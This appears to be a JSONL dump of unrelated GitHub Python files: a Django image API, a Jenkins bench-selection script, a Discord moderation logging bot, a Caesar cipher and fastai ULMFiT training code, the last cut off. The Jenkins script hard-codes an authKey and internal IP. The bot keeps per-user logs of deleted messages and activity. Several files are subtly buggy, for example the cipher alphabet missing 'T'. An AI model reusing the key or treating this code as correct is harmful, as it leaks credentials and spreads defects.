VAriables\n\nprint(Test.a)\nprint(t.a)\n\n# modify the value of static variable\n\nclass Test1:\n a=777\n @classmethod\n def m1(cls):\n cls.a=888\n\n @staticmethod\n def m2():\n Test1.a=999\n\nprint(Test1.a)\nTest1.m1()\nprint(Test1.a)\n\nTest1.m2()\nprint(Test1.a)\n\n\nclass Azim:\n a=10\n \n def __init__(self):\n self.b=20\n\n @classmethod\n def m1(cls):\n cls.a=888\n cls.b=999\n\nt1=Azim()\nt2=Azim()\n\nt1.m1() # the class variable is changed\nprint(t1.a,t1.b)\nprint(t2.a,t2.b)\nprint(Azim.a,Azim.b)","repo_name":"Azim-js/OOPSinPY","sub_path":"second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1608452504","text":"from django.http import HttpResponse\nfrom django.utils import timezone\nimport datetime\nfrom dateutil.parser import parse\nimport json\nfrom rest.models import Image\nfrom rest.models import Mission\n\n\ndef get_current_time():\n time = timezone.now().__str__()\n return time\n\n\ndef get_current_image():\n return send_response(Image.objects.last().as_dict())\n\n\ndef get_images(start_number, end_number):\n if start_number < end_number:\n image_results = Image.objects.all().order_by(\"-imagetimestamp\")[start_number:end_number]\n else:\n image_results = Image.objects.all()[:1]\n images = [image.as_dict() for image in image_results]\n return send_response(images)\n\n\ndef get_mission_images(mission_id, start_number, end_number):\n try:\n requested_images = Image.objects.filter(\n mission_missionid=Mission.objects.get(missionid=mission_id)).order_by(\"-imagetimestamp\")[start_number: end_number]\n mission_images = [image.as_dict() for image in requested_images]\n return send_response(mission_images)\n except Mission.DoesNotExist:\n return send_image_error(\"Mission does not exist\")\n\n\ndef get_next_mission_images(mission_id, requested_datetime):\n requested_datetime_object = parse(requested_datetime)\n try:\n requested_images = Image.objects.filter(\n mission_missionid=Mission.objects.get(missionid=mission_id),\n imagetimestamp__gt=requested_datetime_object\n ).order_by(\"-imagetimestamp\")\n mission_images = [image.as_dict() for image in requested_images]\n return send_response(mission_images)\n except Mission.DoesNotExist:\n return send_image_error(\"Mission does not exist\")\n \n\ndef get_next_mission_images_via_image_id(mission_id, image_id, length):\n try:\n if length is None:\n requested_images = Image.objects.filter(\n mission_missionid=Mission.objects.get(missionid=mission_id),\n imageid__lt=image_id\n ).order_by(\"-imageid\")\n else:\n requested_images = Image.objects.filter(\n mission_missionid=Mission.objects.get(missionid=mission_id),\n imageid__lt=image_id\n ).order_by(\"-imageid\")[:length]\n mission_images = [image.as_dict() for image in requested_images]\n return send_response(mission_images)\n except Mission.DoesNotExist:\n return send_image_error(\"Mission does not exist\")\n\n\ndef get_next_image_via_image_id(image_id, length):\n if length is None:\n requested_images = Image.objects.filter(\n imageid__lt=image_id\n ).order_by(\"-imageid\")\n else:\n requested_images = Image.objects.filter(\n imageid__lt=image_id\n ).order_by(\"-imageid\")[:length]\n images = [image.as_dict() for image in requested_images]\n return send_response(images)\n\n\ndef post_images(image_object, mission_id):\n try:\n Image.objects.create(imagetimestamp=get_current_time(),\n imageblob=image_object,\n mission_missionid=Mission.objects.get(missionid=mission_id))\n return send_response({\"status\": \"True\"})\n except Mission.DoesNotExist:\n return send_image_error(\"Mission does not exist\")\n\n\ndef send_response(message):\n return HttpResponse(json.dumps(message))\n\n\ndef send_image_error(message):\n return HttpResponse(json.dumps({\"status\": \"error\",\n \"data\": message\n }),\n status=403)\n","repo_name":"SquireOfSoftware/Orion","sub_path":"rest/image_service.py","file_name":"image_service.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21275645174","text":"import requests\nimport json\nimport os\nimport sys\nimport argparse\nimport time\nimport datetime\n\nparser = argparse.ArgumentParser()\nparser.add_argument('wsname')\nargs = parser.parse_args()\nparams = vars(args)\n\ndef getJenkinsNode(ip, authKey, projectId, wbmap, wsname, bnmap):\n getResourceUrl = 'http://{ip}:8085/api/v2/monitoring/resources'.format(ip=ip)\n getBenchStatus = 'http://{ip}:8085/api/v2/monitoring/testexecution'.format(ip=ip)\n getBenchHeartBeat = 'http://{ip}:8085/api/v2/monitoring/heartbeat'.format(ip=ip)\n params = {'projectId':projectId, 'authKey':authKey}\n benches = requests.get(getResourceUrl, params).json()\n avaBenches = loadJson(wbmap)[0][wsname]\n exeProgressDict = {}\n for bench in avaBenches:\n for b in benches:\n if bench in b.values():\n resourceId = benches[benches.index(b)] # type: Dict\n params.update(resourceId)\n online = requests.get(getBenchHeartBeat, params).json()['online']\n if online:\n exeInfo = requests.get(getBenchStatus, params).json()\n benchStatus = exeInfo['status']\n if benchStatus == 'IDLE':\n nodeLabel = loadJson(bnmap)[0][bench]\n return nodeLabel\n else:\n exeProgress = exeInfo['actual']/exeInfo['total']\n exeProgressDict[bench] = exeProgress\n \n idlestBench = list(exeProgressDict.keys())[list(exeProgressDict.values()).index(min(exeProgressDict.values()))]\n nodeLabel = loadJson(bnmap)[0][idlestBench]\n return nodeLabel\n\ndef loadJson(jsonPath):\n with open(jsonPath, 'r') as f:\n jsonContent = f.read()\n text = json.loads(jsonContent)\n return text\n\nip = '10.211.55.2'\nbench_node = 'bench_node_mapping.json'\nws_bench = 'ws_bench_mapping.json'\nauthKey = 'SPsdDWt2WinZ1iZBN9Sb4ehCZe41qZkLJV7uKiBiBhLwS6kOuivdxkbLbAiRIOwrPr_pxnetu0GqK4LagJc8hq-MvraD7YWG9D971fR-X0QxIy7ldwayRl8-CYGEnK7kVKUw4PF3QAWwhFjiN26Khs-RqGuWickjnPFgswXsowFSiBhcPGpEIU10wHG0HdBLtrK_W0noOseSNM2WBeqTA6KZKYfIjab06v5DZJ-rKZRjJU0EMhhP2WhkEPVxPUZeeM7ZPXuFa_1YG9QbfQVGe86EU2eDIrZcfWIaCZrhiZMY_To3O6Zrj2AHHfNBh5yyQRi33V_KNsp2R_fy7qjte6FzXFUoSNHki57XoeXEiq0rZsYunUtvjkZu6hz78bz0f86RxvNlV6K9GKCHnduGGQ=='\nprojectId = '1'\nwsname = params['wsname']\n\n\nidlestBench = getJenkinsNode(ip, authKey, projectId, ws_bench, wsname, bench_node)\nwith open(r'jenkinsNode.properties', 'w') as f:\n f.write('env.jenkinsNode={}'.format(repr(idlestBench)))\n# print(idlestBench)","repo_name":"nwtg/ECU-TEST","sub_path":"getJenkinsNode.py","file_name":"getJenkinsNode.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"18459094076","text":"import onmt\nimport onmt.modules\n\n\nclass TranslatorParameter(object):\n\n def __init__(self, filename):\n\n self.model = \"\"\n self.src = \"\"\n self.src_img_dir = \"\"\n self.tgt = \"\"\n self.output = \"\"\n self.beam_size = 1\n self.batch_size = 1\n self.max_sent_length = 100\n self.dump_beam = \"\"\n self.n_best = self.beam_size\n self.replace_unk = False\n self.gpu = -1\n self.cuda = 0\n self.verbose = False\n self.normalize = True\n\n self.beta = 0.0\n self.alpha = 0.0\n self.start_with_bos = True\n self.fp16 = False\n self.ensemble_op = 'mean'\n self.autoencoder = None\n self.encoder_type = 'text'\n self.lm = None\n\n self.src_lang = 'src'\n self.tgt_lang = 'tgt'\n self.bos_token = onmt.constants.BOS_WORD\n self.sampling = False\n self.attributes = None\n self.no_bos_gold = False\n self.no_repeat_ngram_size = 0\n self.no_buffering = False\n self.src_align_right = False\n self.read_file(filename)\n\n def read_file(self, filename):\n\n f = open(filename)\n\n line = f.readline()\n\n while line:\n\n w = line.strip().split()\n\n if w[0] == \"model\":\n self.model = w[1]\n elif w[0] == \"beam_size\":\n self.beam_size = int(w[1])\n elif w[0] == \"src_lang\":\n self.src_lang = w[1]\n elif w[0] == \"tgt_lang\":\n self.tgt_lang = w[1]\n elif w[0] == \"no_repeat_ngram_size\":\n self.no_repeat_ngram_size = int(w[1])\n\n line = f.readline()\n\n\nclass OnlineTranslator(object):\n def __init__(self, model):\n opt = TranslatorParameter(model)\n from onmt.inference.fast_translator import FastTranslator\n self.translator = FastTranslator(opt)\n # self.translator = onmt.EnsembleTranslator(opt)\n\n def translate(self,input):\n predBatch, predScore, predLength, goldScore, numGoldWords, allGoldScores = self.translator.translate([input.split()],[])\n\n return \" \".join(predBatch[0][0])\n \n\n","repo_name":"nlp-dke/NMTGMinor","sub_path":"onmt/online_translator.py","file_name":"online_translator.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"24467841224","text":"import os\nimport random\nimport shutil\n\n\n# source_file:源路径, target_ir:目标路径\ndef cover_files(source_dir, target_ir):\n for file in os.listdir(source_dir):\n source_file = os.path.join(source_dir, file)\n\n if os.path.isfile(source_file):\n shutil.copy(source_file, target_ir)\n\n\ndef ensure_dir_exists(dir_name):\n \"\"\"Makes sure the folder exists on disk.\n Args:\n dir_name: Path string to the folder we want to create.\n \"\"\"\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n\ndef moveFile(file_dir, save_dir):\n ensure_dir_exists(save_dir)\n path_dir = os.listdir(file_dir) # 取图片的原始路���\n filenumber = len(path_dir)\n rate = 0.2 # 自定义抽取图片的比例,比方说100张抽10张,那就是0.1\n picknumber = int(filenumber * rate) # 按照rate比例从文件夹中取一定数量图片\n sample = random.sample(path_dir, picknumber) # 随机选取picknumber数量的样本图片\n # print (sample)\n for name in sample:\n shutil.move(file_dir + name, save_dir + name)\n\n\nif __name__ == '__main__':\n file_dir = 'D:\\AI\\BCI\\project\\EEG_ETR\\pytorch-cnn-cifar10-master\\Mental Task\\Rest\\my_train\\sub27/' # 源图片文件夹路径\n save_dir = 'D:\\AI\\BCI\\project\\EEG_ETR\\pytorch-cnn-cifar10-master\\Mental Task\\Rest\\my_test\\sub27/' # 移动到新的文件夹路径\n moveFile(file_dir,save_dir)\n\n\n'''\nimport os, sys\nimport random\nimport shutil\n\n\ndef copyFile(fileDir):\n pathDir = os.listdir(fileDir)\n sample = random.sample(pathDir, 300)\n print(sample)\n for name in sample:\n shutil.move(fileDir + name, tarDir + name)\n\n\nif __name__ == '__main__':\n # open /textiles\n path = \"/home/fairy/workspace/dataset/textiles/\"\n dirs = os.listdir(path)\n i = 0\n # output all folds\n for file in dirs:\n print(file)\n i = i + 1\n filename = \"/home/fairy/workspace/dataset/Fabric\" + str(i)\n os.mkdir(filename)\n fileDir = path + \"Fabric\" + str(i) + \"/\"\n tarDir = filename + \"/\"\n copyFile(fileDir)\n'''","repo_name":"iwjlrr/FastGAN_EEG","sub_path":"EEG transfor/cut_file.py","file_name":"cut_file.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27628262980","text":"import discord\r\nfrom discord.ext import commands\r\nimport asyncio\r\nimport datetime\r\n\r\nfrom library.managers.file_manager import FileManager, Logs\r\nfrom library.managers.sql_manager import SQLManager\r\n\r\n\r\nclass LogBot(commands.Bot):\r\n def __init__(self):\r\n super().__init__(command_prefix = \"!\")\r\n self.active_voices = {}\r\n \r\n def initalize(self):\r\n self.load_extension(\"library.cogs.log_commands\")\r\n\r\n #def destroy(self):\r\n #self.is_logging = False\r\n #self.loop.get_event_loop().wait_until_complete(asyncio.sleep(1))\r\n\r\n ### System events (Use log_entry_key Logs.SYSTEM) ###\r\n async def on_ready(self):\r\n self.file_manager = FileManager()\r\n self.db_manager = SQLManager()\r\n self.db_manager.initalize()\r\n self.file_manager.initalize()\r\n\r\n self.file_manager.add_log(Logs.SYSTEM, f'{self.user} fully initalized and ready to log')\r\n print(\"Fully initalized and ready to rumble\")\r\n\r\n def sync_voice_duration(self, member):\r\n user = self.db_manager.find_user(member.id, member.name)\r\n if not 'voice_time' in user: user['voice_time'] = 0\r\n duration = {'member': user, 'connected_voices': []}\r\n if not(member.voice) or not (str(member.id) in self.active_voices):\r\n return duration\r\n \r\n now = datetime.datetime.now()\r\n member_voice = self.active_voices[str(member.id)]\r\n member_joined_at = datetime.datetime.strptime(member_voice['joined_at'], \"%a %b %d %H:%M:%S %Y\")\r\n participants = [participant for participant in member.voice.channel.members if not(participant.id == member.id)]\r\n\r\n user['voice_time'] = int((now - member_joined_at).total_seconds()) + user['voice_time']\r\n \r\n for participant in participants:\r\n active_voice_join_time = datetime.datetime.strptime(self.active_voices[str(participant.id)]['joined_at'], \"%a %b %d %H:%M:%S %Y\")\r\n entry_id = f\"{member.id}-{participant.id}\"\r\n connected_time = self.db_manager.select_data(Logs.VOICE, entry_id)\r\n if not connected_time:\r\n connected_time = {'id': entry_id, 'duration': 0}\r\n connected_time['duration'] = connected_time['duration'] + abs((member_joined_at - active_voice_join_time).total_seconds())\r\n duration['connected_voices'].append(connected_time)\r\n \r\n self.db_manager.set_data(Logs.USER, duration['member'])\r\n for connected_voice in duration['connected_voices']:\r\n self.db_manager.set_data(Logs.VOICE, connected_voice)\r\n return duration\r\n\r\n async def on_error(self, *args, **kwargs):\r\n pass\r\n\r\n async def on_bulk_message_delete(self, messages):\r\n for message in messages:\r\n await self.on_message_delete(message)\r\n\r\n ### User events (Use log_entry_key Logs.USER) ###\r\n async def on_message(self, message):\r\n await self.process_commands(message)\r\n if message.author.bot or message.content[0] == self.command_prefix:\r\n return False\r\n user = self.db_manager.find_user(message.author.id, message.author.name)\r\n user_message = {\r\n 'content': message.content, \r\n 'created_at': message.created_at.ctime(), \r\n 'channel': message.channel.name,\r\n 'id': message.id,\r\n 'owner': message.author.id\r\n }\r\n entry = f'SENT_M: ({message.created_at}) {message.author.name}: {message.content}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = message.author.name)\r\n self.db_manager.set_data(Logs.MESSAGE, user_message)\r\n\r\n async def on_message_delete(self, message):\r\n now = datetime.datetime.now()\r\n user_message = self.db_manager.select_data(Logs.MESSAGE, message.id)\r\n user_message['deleted_at'] = now.ctime()\r\n entry = f'DELETED_M: ({message.created_at}) {message.author.name}: {message.content}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = message.author.name)\r\n self.db_manager.set_data(Logs.MESSAGE, user_message)\r\n\r\n async def on_message_edit(self, before, after):\r\n entry = f'EDITED_M: \\n\\t BEFORE: ({before.created_at}) {before.author.name}: {before.content} \\n\\t AFTER: ({after.created_at}) {after.author.name}: {after.content}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = before.author.name)\r\n\r\n async def on_reaction_add(self, reaction, user):\r\n entry = f'ADDED_R: {user.name} reacted {reaction.emoji.name} to {reaction.message.content} by {reaction.message.author.name}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = user.name)\r\n\r\n async def on_reaction_remove(self, reaction, user):\r\n entry = f'REMOVED_R: {user.name} removed reaction {reaction.emoji.name} to {reaction.message.content} by {reaction.message.author.name}'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = user.name)\r\n\r\n async def on_member_join(self, member):\r\n user = self.db_manager.find_user(member.id, member.name)\r\n user['joined_at'] = member.joined_at.ctime()\r\n entry = f'JOINED_M: {member.name} joined'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = member.name)\r\n self.db_manager.set_data(Logs.USER, user)\r\n\r\n async def on_member_remove(self, member):\r\n user = self.db_manager.find_user(member.id, member.name)\r\n user['removed_at'] = datetime.datetime.now().ctime()\r\n entry = f'REMOVED_M: {member.name} got removed'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = member.name)\r\n self.db_manager.set_data(Logs.USER, user)\r\n\r\n async def on_voice_state_update(self, member, before, after):\r\n now = datetime.datetime.now()\r\n entries = []\r\n if before.channel:\r\n entries.append(f'VOICE_LEFT: {member.name} left voicechannel {before.channel.name}')\r\n self.sync_voice_duration(member)\r\n del self.active_voices[str(member.id)]\r\n if after.channel:\r\n entries.append(f'VOICE_JOINED: {member.name} joined voicechannel {after.channel.name}')\r\n self.active_voices[str(member.id)] = {\r\n 'joined_at': now.ctime(),\r\n 'channel_id': after.channel.id,\r\n 'channel_name': after.channel.name\r\n }\r\n\r\n if before.afk:\r\n entries.append(f'VOICE_AFK: {member.name} went afk')\r\n if after.afk:\r\n entries.append(f'VOICE_AFK_B: {member.name} came back from afk')\r\n\r\n if before.deaf:\r\n entries.append(f'VOICE_DEAF_M: {member.name} deafend in {before.channel.name} by moderator')\r\n if after.deaf:\r\n entries.append(f'VOICE_UNDEAF_M: {member.name} un-deafend in {after.channel.name} by moderator')\r\n\r\n if before.mute:\r\n entries.append(f'VOICE_MUTE_M: {member.name} muted in {before.channel.name} by moderator')\r\n if after.mute:\r\n entries.append(f'VOICE_UNMUTE_M: {member.name} unmuted in {before.channel.name} by moderator')\r\n\r\n if before.self_deaf:\r\n entries.append(f'VOICE_DEAF_S: {member.name} self-deafend in {before.channel.name}')\r\n if after.self_deaf:\r\n entries.append(f'VOICE_UNDEAF_S: {member.name} self-undeafend in {after.channel.name}')\r\n\r\n if before.self_mute:\r\n entries.append(f'VOICE_MUTE_S: {member.name} self-muted in {before.channel.name}')\r\n if after.self_mute:\r\n entries.append(f'VOICE_UNMUTE_S: {member.name} self-unmuted in {after.channel.name}')\r\n\r\n if before.self_stream:\r\n entries.append(f'STREAM_START: {member.name} started streaming in {before.channel.name}')\r\n if after.self_stream:\r\n entries.append(f'STREAM_END: {member.name} stopped streaming in {after.channel.name}')\r\n\r\n if before.self_video:\r\n entries.append(f'VIDEO_START: {member.name} started video in {before.channel.name}')\r\n if after.self_video:\r\n entries.append(f'VIDEO_END: {member.name} stopped video in {after.channel.name}')\r\n\r\n self.file_manager.add_multiple(Logs.PERSONAL, entries, owner = member.name)\r\n\r\n async def on_member_update(self, before, after):\r\n entries = []\r\n if not (before.status == after.status):\r\n entries.append(f'STATUS: {before.name} changed status from {before.status.name} to {after.status.name}')\r\n\r\n if not (before.activity == after.activity):\r\n entries.append(f'ACTIVITY: {before.name} changed activity from {before.activity.name} to {after.activity.name}')\r\n\r\n if not (before.nickname == after.nickname):\r\n entries.append(f'NICKNAME: {before.name} changed nickname from {before.nickname} to {after.nickname}')\r\n\r\n if not (before.roles == after.roles):\r\n entries.append(f'ROLES: {before.name} changed roles from ({\",\".join(before.roles)}) to ({\",\".after.roles})')\r\n\r\n #if not (before.pending == after.pending):\r\n #entries.append(f'VERIF_P: {before.name} changed status from {before.status.name} to {after.status.name}')\r\n\r\n self.file_manager.add_multiple(Logs.PERSONAL, entries, owner = before.name)\r\n\r\n async def on_user_update(self, before, after):\r\n entries = []\r\n if not (before.avatar == after.avatar):\r\n entries.append(f'AVATAR: {before.name} changed avatar from {before.avatar} to {after.avatar}')\r\n\r\n if not (before.username == after.username):\r\n entries.append(f'USERNAME: {before.name} changed username from {before.username} to {after.username}')\r\n\r\n if not (before.discriminator == after.discriminator):\r\n entries.append(f'DISCRIMINATOR: {before.name} conflicts {before.discriminator} with {after.discriminator}')\r\n\r\n self.file_manager.add_multiple(Logs.PERSONAL, entries, owner = before.name)\r\n\r\n ### Moderation events (Use log_entry_key Logs.MOD) ### \r\n async def on_reaction_clear(self, message, reactions):\r\n entry = f'REACTION_CLEAR: message {message.content} by {message.author.name} had reactions {\",\".join(map(lambda reaction: reaction.emoji.name, reactions))} cleared'\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_reaction_clear_emoji(self, reaction):\r\n entry = f'EMOJI_CLEAR: message {reaction.message.content} by {reaction.message.author.name} had reaction {reaction.emoji.name} cleared'\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n \r\n \"\"\"\r\n async def on_private_channel_update(self, before, after):\r\n entry = f''\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_private_channel_pins_update(self, channel, last_pin):\r\n entry = f''\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_guild_channel_update(self, before, after):\r\n entry = f''\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_guild_channel_pins_update(self, channel, last_pin):\r\n entry = f''\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n \"\"\"\r\n\r\n async def on_member_ban(self, guild, user):\r\n user = self.db_manager.find_user(user.id, user.name)\r\n if not user['banned_times']:\r\n user['banned_times'] = 0\r\n user['banned_times'] += 1\r\n entry = f'USER_BAN: {user.name} got banned'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = user.name)\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n self.db_manager.set_data(Logs.USER, user)\r\n\r\n async def on_member_unban(self, guild, user):\r\n user = self.db_manager.find_user(user.id, user.name)\r\n if not user['unbanned_times']:\r\n user['unbanned_times'] = 0\r\n user['unbanned_times'] += 1\r\n entry = f'USER_UNBAN: {user.name} got unbanned'\r\n self.file_manager.add_log(Logs.PERSONAL, entry, owner = user.name)\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n self.db_manager.set_data(Logs.USER, user)\r\n\r\n async def on_invite_create(self, invite):\r\n entry = f'INVITE_C: invite {invite.url} was created by {invite.inviter}'\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n async def on_invite_delete(self, invite):\r\n entry = f'INVITE_D: invite {invite.url} was deleted by {invite.inviter}'\r\n self.file_manager.add_log(Logs.MOD, entry)\r\n\r\n ### Administrative events (Use log_entry_key Logs.ADMIN) ###\r\n \"\"\"\r\n async def on_private_channel_create(self, channel):\r\n pass\r\n\r\n async def on_private_channel_delete(self, channel):\r\n pass\r\n \r\n async def on_guild_channel_create(self, channel):\r\n pass\r\n\r\n async def on_guild_channel_delete(self, channel):\r\n pass\r\n\r\n async def on_guild_update(self, before, after):\r\n pass\r\n\r\n async def on_guild_role_create(self, role):\r\n pass\r\n\r\n async def on_guild_role_delete(self, role):\r\n pass\r\n\r\n async def on_guild_role_update(self, before, after):\r\n pass\r\n\r\n async def on_guild_emojis_update(self, guild, before, after):\r\n pass\r\n \"\"\"","repo_name":"Kavzor/prox_community","sub_path":"library/bots/log_bot.py","file_name":"log_bot.py","file_ext":"py","file_size_in_byte":13135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73937072249","text":"def ceaser(message, key, mode):\n LETTERS = 'ABCDEFGHIJKLMNOPQRSUVWXYZ'\n translated = ''\n message = message.upper()\n key = key%26\n\n for i in message:\n temp = LETTERS.find(i)\n if mode == 'encrypt':\n temp = temp + key\n elif mode == 'decrypt':\n temp = temp - key\n\n if temp >= len(LETTERS):\n temp -= len(LETTERS)\n elif temp < 0:\n temp += len(LETTERS)\n\n translated += LETTERS[temp]\n print(translated)\n\n\nprint(\"Encrypt:\")\nceaser('CYBRARY',27, 'encrypt')\n\nprint(\"Decrypt:\")\nceaser('DZCSBSZ', 27, 'decrypt')\n","repo_name":"AthiraBR/PortfolioProjects","sub_path":"Python/Ceaser-Cipher/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4940587897","text":"import os\nfrom collections import OrderedDict\nfrom functools import partial\n\nimport argparse\nimport warnings\nimport os, re, sys, datetime, time, string\nimport numpy as np, scipy, random, pandas as pd\nimport pickle, json, collections\nfrom pprint import pprint\nimport ruamel_yaml as yaml\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport sensus.common.global_variables as gv\n\nimport torch, torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\n\nfrom sensus.common.constants import *\n\n#%matplotlib inline\n\n# common imports and global settings\nfrom IPython.core.interactiveshell import InteractiveShell\nfrom IPython.display import display, HTML\nInteractiveShell.ast_node_interactivity = \"all\"\ndisplay(HTML(\"\"))\n\n\nwarnings.filterwarnings('ignore')\n\nfrom notebooks.chetan.fastaiConsole.fastai.fastai.text import *\n\n\nimport spacy\n\nfrom helpers import *\nfrom create_DataLoader import *\nfrom configuration import *\nfrom pre_train import pre_train\nfrom fine_tune import fine_tune\nfrom train_clas import train_clas\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-v\", \"--verbose\", help=\"increase output verbosity\",\n action=\"store_true\")\nparser.add_argument(\"-pt\", \"--pre_train\", help=\"pre train on wiki103\",\n action=\"store_true\")\nparser.add_argument(\"-dt\", \"--domain_specific_train\", help=\"fine tune on yelp dataset\",\n action=\"store_true\")\nparser.add_argument(\"-ft\", \"--fine_tune\", help=\"fine tune on the reviews\",\n action=\"store_true\")\nparser.add_argument(\"-cl\", \"--classifier\", help=\"train classifier\",\n action=\"store_true\")\nargs = parser.parse_args()\n\n#print('verbosity', args.verbose)\n\nif args.verbose:\n print('packages imported')\n\n\n## Check GPU Availability\nif args.verbose:\n try:\n print(\"CUDA device available: \\t\\t\", torch.cuda.is_available())\n print(\"CUDA device count: \\t\\t\", torch.cuda.device_count())\n print(\"CUDA device name: \\t\\t\", torch.cuda.get_device_name(0))\n print(\"CUDA device capability: \\t\", torch.cuda.get_device_capability(0))\n print(\"CUDA device properties: \\n\", torch.cuda.get_device_properties(0))\n except:\n print('gpu not found \\nInstall Dependencies')\n\n\nWORK_DIR = Path(os.path.dirname(SENSUS_DIR))\nos.chdir(WORK_DIR)\nDATA_DIR = Path(DATA_DIR)\nCUR_DIR = Data_path = WORK_DIR /'notebooks/chetan'\n\n\nif args.verbose:\n print(\"Set working directory: \", WORK_DIR)\n\n print(\"Data directory: \", DATA_DIR)\n\n## Load spacy model\nlang = 'en'\ntry:\n spacy.load(lang)\nexcept:\n # TODO handle tokenization of Chinese, Japanese, Korean\n print(f\"spacy tokenization model is not installed for {lang}.\")\n lang = lang if lang in [\"en\", \"de\", \"es\", \"pt\", \"fr\", \"it\", \"nl\"] else \"xx\"\n os.system('python -m spacy download {}'.format(lang))\n\n## Training With Wikipedia\n\n\nif args.pre_train:\n data_path = DATA_DIR / 'wikipedia/wiki/en'\n input_sub = \"tmp\"\n train_fname = \"train.csv\"\n val_fname = \"val.csv\"\n\n df_trnC, df_valC = load_data_training(data_path=data_path, n_labels=None, n_textfield=1)\n #print(df_trnC.head())\n assert df_trnC.columns.tolist() == ['labels', 'text']\n assert df_valC.columns.tolist() == ['labels', 'text']\n\n ## Create Dataloader for wiki103\n\n #data_lm_preTrain, vocab_update_wiki, truncate_val = get_DataLoader(path=data_path, data_trn=df_trnC,\n # data_val=df_valC, n_labels=None, Save_Path = Data_path, DataLoader_save_path = 'DataLoader/data_lm_preTrain_wiki.pkl', vocab_save_path = 'vocab/preTrain_wiki_itos.pkl', bs = 32)\n #\n # ## Save the Dataloader\n #\n # save_workpsace(work_dir=Data_path, data_lm=data_lm_preTrain, save_type=['data_lm'],\n # DataLoaderLM_path='DataLoader/data_lm_preTrain_wiki.pkl')\n\n # Load the dataloader\n data_lm = load_data(Data_path / 'DataLoader', 'data_lm_preTrain_wiki.pkl')\n # print(awd_lstm_lm_config_custom)\n pre_train(Data_path, data_loader_folder='DataLoader', dataLoader_name='data_lm_preTrain_wiki.pkl',\n model_save_path='DataLoader/models/preTrain_wiki_model',\n encoding_save_path='encoding/preTrain_wiki_encoding',\n cuda_id=0, pretrained=False, custom_config = True, lr = 1e-01, arch = AWD_LSTM)\n\n\n\nif args.domain_specific_train:\n # tokenization parameters\n data_path = DATA_DIR / 'yelp'\n input_sub = \"tmp\"\n train_fname = \"train.csv\"\n val_fname = \"val.csv\"\n n_labels = 1\n n_textfield = 1\n chunksize = 100000\n lang = 'en'\n\n df_trnYelp, df_valYelp = load_data_training(data_path=data_path, n_labels=1, n_textfield=1)\n vocab_update = False\n\n # data_lmYelp, vocab_update, truncate_val = get_DataLoader(path=data_path, data_trn=df_trnYelp, data_val=df_valYelp, n_labels = n_labels,\n # use_pretrain_vocab=False, pretrain_path=Data_path / 'vocab',\n # pretrain_vocab_name='pretrain_wiki_itos.pkl',\n # no_update_pretrain_vocab=True, max_vocab=70000, Save_Path = Data_path, DataLoader_save_path = 'DataLoader/data_lm_domainSpecific_Yelp.pkl', vocab_save_path = 'vocab/domainSpecific_Yelp_itos.pkl', bs = 32)\n\n fine_tune(work_dir=Data_path, data_loader_folder='DataLoader', dataLoader_name='data_lm_domainSpecific_Yelp.pkl', arch=AWD_LSTM,\n custom_config=True, pretrained=True,\n pretrained_fnames=[Data_path / 'DataLoader/models/preTrain_wiki_model', Data_path / 'vocab/preTrain_wiki_itos'],\n drop_mult=0.5, opt_func='Adam', loss_func=None, metrics=[accuracy], true_wd=True, bn_wd=True, wd=0.01,\n train_bn=True, lr=1e-01, model_save_path='DataLoader/models/domainSpecific_Yelp_model', encoding_save_path='encoding/domainSpecific_Yelp_encoding',\n cuda_id=0, vocab_weight_balance=vocab_update)\n\n\nif args.fine_tune:\n data_path = DATA_DIR / 'phase1/bml'\n\n df_trnRev, df_valRev = load_data_training(data_path=data_path, n_labels=10, n_textfield=1)\n\n #print(df_trnRev.head())\n\n data_lmRev, vocab_update, truncate_val = get_DataLoader(path=data_path, data_trn=df_trnRev, data_val=df_valRev,\n use_pretrain_vocab=False, pretrain_path=Data_path / 'vocab',\n pretrain_vocab_name='pretrain_wiki_itos.pkl',\n no_update_pretrain_vocab=True, max_vocab=70000, n_labels=10, Save_Path = Data_path, DataLoader_save_path = 'DataLoader/data_lm_fineTune_Rev.pkl', vocab_save_path = 'vocab/fineTune_Rev_itos.pkl', bs = 8)\n\n #print(data_lmRev.show_batch())\n\n fine_tune(work_dir=Data_path, data_loader_folder='DataLoader', dataLoader_name='data_lm_fineTune_Rev.pkl', arch=AWD_LSTM,\n custom_config=True, pretrained=True,\n pretrained_fnames=[Data_path / 'DataLoader/models/domainSpecific_Yelp_model', 